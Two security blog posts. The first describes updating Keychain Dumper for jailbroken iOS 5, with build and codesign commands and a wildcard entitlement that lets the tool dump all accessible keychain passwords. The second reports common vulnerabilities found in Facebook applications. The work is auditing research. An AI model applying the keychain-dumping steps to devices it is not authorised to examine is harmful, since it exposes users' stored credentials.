Keychain Dumper Updated for iOS 5

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

Last year I pushed a copy of Keychain Dumper to Github to help audit what sensitive information an application stores on an iOS device using Apple’s Keychain service.  I’ve received a few issue submissions on github regarding various issues people have had getting Keychain Dumper to work on iOS 5. I meant to look into it earlier, but I was not able to dedicate any time until this week. Besides a small update to the Makefile to make it compatible with the latest SDK, the core issue seemed to have something to do with code signing.

Using the directions I published last year the high level steps to dump keychain passwords were:

  1. Compile
  2. Push keychain_dumper to iOS device
  3. Use keychain_dumper to export all the required entitlements
  4. Use ldid to sign these entitlements into keychain_dumper
  5. Rerun keychain_dumper to dump all accessible keychain items
Steps 1-3 continue to work fine on iOS 5.  It is step 4 that breaks, and it just so happens that this step was the one step I completely took for granted, as I had never looked into how ldid works.  Originally, signing the entitlements into keychain_dumper was as simple as:
./keychain_dumper -e > /var/tmp/entitlements.xml
ldid -S/var/tmp/entitlements.xml keychain_dumper

However, on iOS 5 you get the following error when running ldid:

codesign_allocate: object: keychain_dumper1 malformed object
(unknown load command 8)
util/ldid.cpp(582): _assert(78:WEXITSTATUS(status) == 0)

Looking around for the code to ldid, I found that ldid actually doesn’t do much of the heavy lifting with regard to code signing, as ldid simply execs out to another command, codesign_allocate (the allocate variable below):

execlp(allocate, allocate, "-i", path, "-a", arch, ssize, "-o", temp, NULL);

The Cydia code for codesign_allocate looks to be based off of the odcctools project that was once open-source from Apple.  I am unclear, but it appears as though this codebase was eventually made closed-source by Apple, as the  code does not appear to have been updated anytime recently.  Digging into the code for codesign_allocate, the error above:

unknown load command 8

makes much more sense, as codesign_allocate parses each of the Mach-O headers, including each of the load commands that are part of Mach-O file structure.  It appears that load command 8 must have been added sometime between when I first released Keychain Dumper and now, as the version of codesign_allocate that comes with Cydia does not support parsing this header.  This header is responsible for determining the minimum required version of iOS for the application.  If someone knows a compile time flag to prevent this (and possibly other) unsupported header(s) from being used let me know and I’ll update the Makefile.  The other options to get the tool working again were to either update odcctools to work with the new Mach-O structure and/or figure out an alternative way of signing applications.

Historically there have been three ways to create pseudo-signatures for Cydia based applications (you can see them here).  The third uses sysctl, and is no longer valid, as Apple made some changes that make the relevant configuration entries read-only  The second option uses ldid, and was the approach I used originally.  The first uses the tools that come with OS X to create a self-signed certificate and use the command line development tools to sign your jailbroken iOS application with the self-signed certificate.  It appears as though the tools provided by Apple are basically the updated versions to the odcctools project referenced earlier.  The same codesign_allocate tool exists, and looks to be more up to date, with support for parsing all the relevant headers.  I decided to leverage the integrated tools, as it seems the best way to ensure compatibility going forward.  Using Apple’s tools I was able to sign the necessary entitlements into keychain_dumper and dump all the relevant Keychain items as before.  The steps for getting this to work are as follows:

  1. Open up the Keychain Access app located in /Applications/Utilties/Keychain Access
  2. From the application menu open Keychain Access -> Certificate Assistant -> Create a Certificate
  3. Enter a name for the certificate, and make note of this name, as you will need it later when you sign Keychain Dumper.  Make sure the Identity Type is “Self Signed Root” and the Certificate Type is “Code Signing”.  You don’t need to check the “Let me override defaults” unless you want to change other properties on the certificate (name, email, etc).
  4. Compile Keychain Dumper as instructed in the original blog post(condensed below):
ln -s /Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS5.0.sdk/ sdk
ln -s /Developer/Platforms/iPhoneOS.platform/Developer toolchain
  1. scp the resulting keychain_dumper to your phone (any file system reference made here will be in /tmp)
  2. Dump the entitlements from the phone
./keychain_dumper -e > /var/tmp/entitlements.xml
  1. Copy the entitlements.xml file back to your development machine (or just cat the contents and copy/paste)
  2. Sign the application with the entitlements and certificate generated earlier (you must select “Allow” when prompted to allow the code signing tool to access the private key of the certificate we generated)
codesign -fs "Test Cert 1" --entitlements entitlements.xml keychain_dumper
  1. scp the resulting keychain_dumper to your phone (you can remove the original copy we uploaded in step 5)
  2. you should now be able to dump Keychain items as before
  1. If all of the above worked you will see numerous entries that look similar to the following:
Service: Vendor1_Here
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Now, the above directions work fine, but after dumping the passwords something caught my eye.  Notice the asterisk in the above entitlement group.  The Keychain system restricts access to individual entries according to the “Entitlement Group”, which is why we first dumped all of the entitlement groups used by applications on the phone and then signed those entitlements into the keychain_dumper binary.  I thought that maybe the asterisk in the above entitlement group had some sort of wildcarding properties.  So, as a proof of concept, I created a new entitlements.xml file that contains a single entitlement

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"    "">
<plist version="1.0">

The above file lists a single entitlement defined by “*”, which if the assumption holds, might wildcard all Entitlement Groups.  Using the above file, I recompiled Keychain Dumper and proceeded to resign the application using the wildcard entitlements.xml file.  Surprise….it works, and simplifies the workflow.  I have added this entitlements.xml file to the Git repository.  Instead of first needing to upload keychain_dumper to the phone, dump entitlements, and then sign the app, you can simply sign the application using this entitlements.xml file.  Moreover, the binary that is checked in to Git is already signed using the wildcard entitlement and should work with any jailbroken iOS device (running iOS 5), as there is no need to customize the binary for each user’s device/entitlements.

The consolidated directions can be found on the Github repository page, found here.   A direct link to the binary, that should hopeful work on any jailbroken iOS 5 device can be found here.

Facebook Applications Have Nagging Vulnerabilities

By Neohapsis Researchers Andy Hoernecke and Scott Behrens

This is the second post in our Social Networking series. (Read the first one here.)

As Facebook’s application platform has become more popular, the composition of applications has evolved. While early applications seemed to focus on either social gaming or extending the capabilities of Facebook, now Facebook is being utilized as a platform by major companies to foster interaction with their customers in a variety forms such as sweepstakes, promotions, shopping, and more.

And why not?  We’ve all heard the numbers: Facebook has 800 million active users, 50% of whom log on everyday. On average, more than 20 million Facebook applications are installed by users every day, while more than 7 million applications and websites remain integrated with Facebook. (1)  Additionally, Facebook is seen as a treasure trove of valuable data accessible to anyone who can get enough “Likes” on their page or application.

As corporate investments in social applications have grown, Neohapsis Labs researchers have been requested to help clients assess these applications and help determine what type of risk exposure their release may pose. We took a sample of the applications we have assessed and pulled together some interesting trends. For context, most of these applications are very small in size (2-4 dynamic pages.)  The functionality contained in these applications ranged from simple sweepstakes entry forms and contests with content submission (photos, essays, videos, etc.) to gaming and shopping applications.

From our sample, we found that on average the applications assessed had vulnerabilities in 2.5 vulnerability classes (e.g. Cross Site Scripting or SQL Injection,) and none of the applications were completely free of vulnerabilities. Given the attack surface of these applications is so small, this is a somewhat surprising statistic.

The most commonly identified findings in our sample group of applications included Cross-Site Scripting, Insufficient Transport Layer Protection, and Insecure File Upload vulnerabilities. Each of these vulnerabilities classes will be discussed below, along with how the social networking aspect of the applications affects their potential impact.

Facebook applications suffer the most from Cross-Site Scripting. This type of vulnerability was identified on 46% of the applications sampled.  This is not surprising, since this age old problem still creeps up into many corporate and personal applications today.  An application discovered to be vulnerable to XSS could be used to attempt browser based exploits or to steal session cookies (but only in the context of the application’s domain.)

These types of applications are generally framed inline [inling framing, or iframing, is a common HTML technique for framing media content] on a Facebook page from the developer’s own servers/domain. This alleviates some of the risk to the user’s Facebook account since the JavaScript can’t access Facebook’s session cookies.  And even if it could, Facebook does use HttpOnly flags to prevent JavaScript from accessing session cookies values.  But, we have found that companies have a tendency to utilize the same domain name repeatedly for these applications since generally the real URL is never really visible to the end user. This means that if one application has a XSS vulnerability, it could present a risk to any other applications hosted at the same domain.

When third-party developers enter the picture all this becomes even more of a concern, since two clients’ applications may be sharing the same domain and thus be in some ways reliant on the security of the other client’s application.

The second most commonly identified vulnerability, affecting 37% of the sample, was Insufficient Transport Layer Protection While it is a common myth that conducting a man-in-the-middle attack against cleartext protocols is impossibly difficult, the truth is it’s relatively simple.  Tools such as Firesheep aid in this process, allowing an attacker to create custom JavaScript handlers to capture and replay the right session cookies.  About an hour after downloading Firesheep and looking at examples, we wrote a custom handler for an application that was being assessed that only used SSL when submitting login information.   On an unprotected WIFI network, as soon as the application sent any information over HTTP we had valid session cookies, which were easily replayed to compromise that victim’s session.

Once again, the impact of this finding really depends on the functionality of the application, but the wide variety of applications on Facebook does provide a interesting and varied landscape for the attacker to choose from.  We only flagged this vulnerability under specific circumstance where either the application cookies were somehow important (for example being used to identify a logged in session) or the application included functionality where sensitive data (such as PII or credit card data) was transmitted.

The third most commonly identified finding was Insecure File Upload. To us, this was surprising, since it’s generally not considered to be one of the most commonly identified vulnerabilities across all web applications. Nevertheless 27% of our sample included this type of vulnerability. We attribute its identification rate to the prevalence of social applications that include some type of file upload functionality (to share an avatar, photo, document, movie, etc.)

We found that many of the applications we assessed have their file upload functionality implemented in an insecure way.  Most of the applications did not check content type headers or even file extensions.  Although none of the vulnerabilities discovered led to command injection flaws, almost every vulnerability exploited allowed the attacker to upload JavaScript, HTML or other potentially malicious files such as PDF and executables.  Depending on the domain name affected by this vulnerability, this flaw would aid in the attacker’s social engineering effort as the attacker now has malicious files on a trusted domain.

Our assessment also identified a wide range of other types of vulnerabilities. For example, we found several of these applications to be utilizing publicly available admin interfaces with guessable credentials. Furthermore, at least one of the admin interfaces was riddled with stored XSS vulnerabilities. Sever configurations were also a frequent problem with unnecessary exposed services and insecure configuration being repeatedly identified.

Finally, we also found that many of these web applications had some interesting issues that are generally unlikely to affect a standard web application. For example, social applications with a contest component may need to worry about the integrity of the contest. If it is possible for a malicious user to game the contest (for example by cheating at a social game and placing a fake high score) this could reflect badly on the application, the contest, and the sponsoring brand.

Even though development of applications integrated with Facebook and other social network sites in increasing, we’ve found companies still tend to handle these outside of their normal security processes. It is important to realize that these applications can present a risk and should be thoroughly examined just like traditional stand alone web applications.